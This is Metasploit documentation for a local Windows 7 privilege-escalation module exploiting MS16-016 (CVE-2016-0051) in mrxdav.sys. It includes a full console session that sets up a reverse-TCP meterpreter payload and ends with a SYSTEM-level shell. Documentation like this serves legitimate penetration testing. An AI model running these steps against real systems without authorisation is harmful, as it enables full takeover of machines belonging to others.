
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/local/ms16_016_webdav.md

Introduction

This module exploits a null pointer dereference vulnerability present in the mrxdav.sys kernel driver on Windows 7 x86. The vulnerability is described by MS16-016 and CVE-2016-0051. The module allows the user to spawn a new payload, such as meterpreter, on the target system with elevated privileges (NT AUTHORITY\SYSTEM).

Usage

You'll first need to obtain a session on the target system. Next, once the module is loaded, one simply needs to set the payload and session options. From here, running the module will result in the payload being executed with system-level privileges.

An example session follows:

```
meterpreter > background
[*] Backgrounding session 5...
msf exploit(handler) > use exploits/windows/local/ms16_016_webdav
msf exploit(ms16_016_webdav) > set session 5
session => 5
msf exploit(ms16_016_webdav) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms16_016_webdav) > set lport 4567
lport => 4567
msf exploit(ms16_016_webdav) > set lhost 192.168.1.203
lhost => 192.168.1.203
msf exploit(ms16_016_webdav) > run

[*] Started reverse TCP handler on 192.168.1.203:4567
[*] Launching a process to host the payload DLL, then reflectively injecting the DLL and running it...
[*] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (957999 bytes) to 192.168.1.221
[*] Meterpreter session 12 opened (192.168.1.203:4567 -> 192.168.1.221:49266) at 2016-07-05 22:07:34 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```